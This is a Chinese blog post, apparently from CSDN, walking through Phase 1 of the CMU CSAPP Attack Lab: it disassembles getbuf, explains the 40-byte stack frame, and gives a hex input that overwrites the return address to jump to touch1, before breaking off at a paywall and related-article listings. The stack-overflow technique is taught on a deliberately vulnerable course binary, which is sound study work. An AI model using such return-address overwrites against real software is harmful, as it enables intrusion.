CSAPP-Lab03 Attack Lab 详细解析

最新推荐文章于 2024-02-02 09:41:27 发布
最新推荐文章于 2024-02-02 09:41:27 发布
阅读量1.3w 收藏 261
点赞数 65
分类专栏: CSAPP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25591221/article/details/123301271
版权

代码注入 缓冲区溢出 返回导向编程 ROP 安全攻防
关键词由CSDN通过智能技术生成

目录

纸上得来终觉浅,绝知此事要躬行

实验概览

Attack!,成为一名黑客不正是我小时候的梦想吗?这个实验一定会很有趣。

CMU 对本实验的官方说明文档:http://csapp.cs.cmu.edu/3e/attacklab.pdf,按照 CMU 的文档一步步往下走就可以了。

Part 1: Code Injection Attacks

在第一部分中,我们要攻击的是ctarget。利用缓冲区溢出,就是程序的栈中分配某个字符数组来保存一个字符串,而我们输入的字符串可以包含一些可执行代码的字节编码或者一个指向攻击代码的指针覆盖返回地址。那么就能直接实现直接攻击或者在执行ret指令后跳转到攻击代码。

Phase 1

分析

首先给了test函数的C语言代码:

void test()
{
   
	int val;
    val = getbuf();
    printf("No exploit. Getbuf returned 0x%x\n", val);
}

这个函数调用了getbuf函数,题目要求我们通过代码注入的方式使getbuf执行结束后不返回到test函数中,而是返回到touch1函数。

touch1的C语言代码如下:

void touch1()
{
   
	vlevel = 1; /* Part of validation protocol */
	printf("Touch1!: You called touch1()\n");
	validate(1);
	exit(0);
}

反汇编test

Dump of assembler code for function test:
   0x0000000000401968 <+0>:     sub    $0x8,%rsp
   0x000000000040196c <+4>:     mov    $0x0,%eax
   0x0000000000401971 <+9>:     callq  0x4017a8 <getbuf>
   0x0000000000401976 <+14>:    mov    %eax,%edx
   0x0000000000401978 <+16>:    mov    $0x403188,%esi
   0x000000000040197d <+21>:    mov    $0x1,%edi
   0x0000000000401982 <+26>:    mov    $0x0,%eax
   0x0000000000401987 <+31>:    callq  0x400df0 <__printf_chk@plt>
   0x000000000040198c <+36>:    add    $0x8,%rsp
   0x0000000000401990 <+40>:    retq
End of assembler dump.

第2行分配栈帧,第4行调用getbuf函数

反汇编getbuf

Dump of assembler code for function getbuf:
   0x00000000004017a8 <+0>:     sub    $0x28,%rsp
   0x00000000004017ac <+4>:     mov    %rsp,%rdi
   0x00000000004017af <+7>:     callq  0x401a40 <Gets>
   0x00000000004017b4 <+12>:    mov    $0x1,%eax
   0x00000000004017b9 <+17>:    add    $0x28,%rsp
   0x00000000004017bd <+21>:    retq
End of assembler dump.

分配了40个字节的栈帧,随后将栈顶位置作为参数调用Gets函数,读入字符串。

此时,栈帧情况是这样的:(以8个字节为单位)

在这里插入图片描述

查到touch1代码地址为:0x4017c0

由此就有了思路,我们只需要输入41个字符,前40个字节将getbuf的栈空间填满,最后一个字节将返回值覆盖为0x4017c0touch1的地址,这样,在getbuf执行retq指令后,程序就会跳转执行touch1函数。

Solution

采用Write up推荐方法,创建一个txt文档存储输入。并按照HEX2RAW工具的说明,在每个字节间用空格或回车隔开。

x86采用小端存储,要注意输入字节的顺序

我们的输入为:

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00

执行命令:

./hex2raw < ctarget01.txt | ./ctarget -q
  • ./hex2raw < ctarget01.txt是利用hex2raw工具将我们的输入看作字节级的十六进制表示进行转化,用来生成攻击字符串
  • |表示管道,将转化后的输入文件作为ctarget的输入参数
  • 由于执行程序会默认连接 CMU 的服务器,-q表示取消这一连接

image-20220304093523423
攻击成功!

Ph

最低0.47元/天 解锁文章
Deconx
关注
专栏目录
my CSAPP Attack lab堆栈详解
业精于勤,荒于嬉
12-03 540
关注公号【逆向通信猿】更精彩!!! 这个实验时学习了简书上的一篇文章后,自己根据课程例子进行的一次小测试,phase 4和5的堆栈图解还没有画,等后续有时间会进行补充。
CSAPP实验——AttackLab
C__C_的博客
12-19 1万+
Attack Lab 缓冲区溢出攻击实验 本次实验涉及对两个具有不同安全漏洞的程序进行五次攻击,攻击方式分为两种Code injection代码注入和Reeturn-oriented programming(ROP)面向返回编程。 1、深入理解当程序没有对缓冲区溢出做足够防范时,攻击者可以利用安全漏洞的方法。 2、更好地了解如何编写更安全的程序,以及编译器和操作系统提供一些帮助,以减少程序的易受攻击性。 3、深入了解x86-64机器代码的堆栈和参数传递机制。 4、深入了解x86-64指令的编码方式。
计算机系统基础实训三—AttackLab实验
zyx210603的博客
01-10 2113
通过这两个验室,我显著提高了使用GDB的熟练程度,并对程序执行有了更深入的了解。实验室的结构化和循序渐进的设计有助于以启发性的方式学习。老师提供的富有洞察力和清晰的图片提示对减少混淆非常有帮助。展望未来,提供更多真实世界的案例、调试练习的错误场景、程序执行的可视化、编码练习将进一步增强学习体验。我也会继续通过积极的练习来磨练我自己的GDB调试技能。
【CSAPP】Attacklab 详解
Schriefer的博客
08-16 2940
CSAPP中attacklab的详解
CSAPP——Lab3——AttackLab
zheyuan的博客
12-02 3528
本篇文章是CSAPP配套实验的第三个,基于缓冲区溢出的攻击实验,和前面的bomb lab同属一章,它们都属于机器级编程这一章的内容,前面的bomb lab是为了阅读和理解汇编语言代码,而这个实验则是为了理解过程调用和x86栈帧结构。 首先还是以吐槽开头,这个实验文件还是从学校系统里下载的,但是很多东西有问题甚至是误导性的。学校将原本的栈缓冲区大小改为了12个字节,并把原版代码包中的hex2raw程序改成了sendstring(迷惑行为,这个函数后来被证明是有问题的),同时做的PPT语焉不详。哦对,这个实验用
CSAPP-Attack-Lab
H-ZeX Coding Life
09-16 533
CSAPP Attack Lab 本文所有答案都是传给hex2raw的文本,hex2raw会在转换好的字符串后添加换行符,所以答案里没有换行符 第一题答案aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa /*
【CSAPP】AttackLab
热门推荐
朝花夕拾
11-03 2万+
这份史上最全的CSAPP之AttackLab实验讲解汇总绝对是攻克这一难题的最佳利器!无论你是刚刚踏入计算机科学的大门,还是已经是一位经验丰富的程序员,这万字详解都将对你产生深远的影响。从最基础的概念到高级的技巧,每一个步骤都被超全面、超详细地剖析。这篇文章是你攻克CSAPP AttackLab的不二之选,不容错过!收藏它,它将成为你的最佳学习伴侣,引领你通往计算机科学的精彩世界!
深入理解计算机系统(CSAPP) 实验详解:AttackLab
专业记录代码
11-23 4124
ROP妙处 先复习一下ret的动作 ret时会将当前%rsp指向的值当作地址弹出,使得%rip程序计数器指到该地址的指令处,这个是通用的说法 换一种说法就是,它会直接返回到地址处。 需要注意的地方 指令是指令,栈是栈不要搞混,不管我们指令如何跳,只要不对%rsp进行操作,我们栈指针就是不会改变,ret会间接改变栈指针,因为它有两个动作(先弹出地址给%rip,然后在给%rsp加8)。 明白了上面说的,我们就可以开始讲ROP了 touch2 ---->4 movq %rax
CSAPP-LAB3-Attack
Dallas01的博客
02-20 1356
文章目录00 PrerequisitePart 1: Code injection1.1 phase_11.2 phase_21.3 phase_3Part2: Returned-Oriented Programming2.1 phase_42.2 Phase_5 00 Prerequisite 听见课堂上老爷子说: But to be a good person you also know what the bet have to know what the bad people do, so part
_Attacklab实验报告.pdf
12-20
本实验通过完成在两个不同安全漏洞的程序上实现五 种攻击,目的就在于:当程序没有对缓冲区溢出做足够防范时,立交 攻击者可能会如何利用这些安全漏洞 ;通过实验,能更好的理解写 出安全的程序的重要性,也能了解到一些编译器和操作 ;以及系统 提供的帮助改善程序安全性的特性。能更深入地理解 x86-64 机器代 码的栈和参数传递机制;能更深入地理解 x86-64 指令的编码方式。 能更熟练地使用调试工具 GDB 和 OBJDUMP。 实验意义:亲自动手体验利用操作系统和网络服务器中安全漏洞 进行攻击的方法,帮助学生学习程序的运行时操作,以及理解这些安 全漏洞的本质,这样以后书写系统代码时能尽量避免这些漏洞。
CSAPP Lab3 attacklab实验源材料
11-07
CSAPP Lab3 attacklab实验源材料 深入理解计算机系统实验三缓冲区溢出攻击实验源材料
深入理解计算机系统(CSAPP) attack-lab详解
独小雪的博客
07-30 2297
深入理解计算机系统(CSAPP) attack-lab详解 下载实验用的程序戳这里 戳这里下载实验说明 开始 target1里的两个程序,ctraget和rtarget,都有缓冲区溢出的bug。实验要求我们做的,是利用这些bug,让程序通过缓冲区溢出,执行我们想执行的代码。下载的文件夹里,ctarget是做代码注入攻击 (code-injection attacks) 用的。rtarget,还有后面的cookie.txt、hex2raw、farm.c都和后面的ROP攻击(return-oriented-pr
csapp attack lab实验总结
qq_25044201的博客
12-10 962
这5个实验都可以说是栈溢出然后修改ret地址而进行的一系列攻击操作。对于前三个可以代码注入的实验来说。 1.考虑shellcode的编写地址位置,shellcode写在哪是关键。 (1)如果要溢出的栈帧开辟的足够大,那就写在这个要溢出的栈帧中,然后在调用当前栈帧的rsp作为shellcode的地址。 (2)如果开辟的栈帧空间较小,那么考虑在上一个栈帧写shellcode 根据jmp rsp(这个rsp是上一个栈帧的rsp)或者根据已知一个buf的地址加偏移量作为shellcode的地址。 2.所调用的函数完
计算机系统基础实验 AttackLab
凌阳的博客
06-18 2783
本文是作者的作业备份,仅作参考,不可照搬抄袭!本实验分为五个阶段,ctarget的三个使用的是CI(code-injection),rtarget的两个阶段使用的是ROP(return-oriented-programming),如表1所示ctarget和rtarget都是用getbuf函数从标准输入读入字符串,getbuf函数定义如下:函数Gets类似于标准库函数gets,从标准输入读入一个字符串(以’\n’或者end-of-file结束),将字符串(带null结束符)存储在指定的目的地址。从这段代码可以
CSAPP--ATTACKLAB实验
最新发布
Innocence_0的博客
02-02 1473
一、实验步骤二、目标程序三、实验内容第一部分:代码注入攻击3.1. 第一关3.2. 第二关3.3. 第三关四. 实验内容第二部分:面向返回的编程4.1. 第四关4.2. 第五关附录A HEX2RAW的使用附录B 生成字节代码1.1 第一步:获取文件,输入你的学号和email地址,得到targetXXXX.tar文件。
CSAPP: Attacklab
Rachel_IS的博客
11-21 2337
命运多舛的attacklab 从上周卡到今天,愣是卡死在phase2 一度以为这次要gg了… 不过今天心理学课灵感大开!!瞬间写完!!开心???????????????? 来总结一下曲折的经历叭~ 这个lab真的能让人学会很多gdb的操作 先objdump -d 出需要的反汇编代码 先简要描述一下这个lab在干什么: 有一个函数getbuf通过调用Gets 获得你输入的字符串,你可以利用栈溢出修改返回地址和进行一系列操...
深入理解计算机系统AttackLab实验
weixin_51230027的博客
03-21 6232
深入理解计算机系统AttackLab实验,函数中的Gets函数与标准库中的gets函数类似,它从standard input中读取字符(以\n或者EOF结尾)并将它们添加字符串结尾符\0后存入缓冲区中。学生需要根据ctarget和rtarget文件及其反汇编代码来确定缓冲区位置及大小,并想办法构建出攻击字符串。
《Intro to Computer Systems》(csapp)LAB3(Attack Lab)
weixin_44520881的博客
10-25 726
话说,试了一下retq弹栈64位,明明pushq压入64位,却只能pushq $0x4017ec,不能pushq $0x4017ec001200 目录运行时栈结构缓存区溢出对抗缓冲区溢出的方法栈随机化栈破坏检测(金丝雀值)LAB3Part I: Code Injection AttacksLevel.11Level.12我的错解正解分析Level.13Part II: Return-Oriented Programminglevel.21Level.23 运行时栈结构 缓存区溢出 比如不安全的gets()
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deconx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值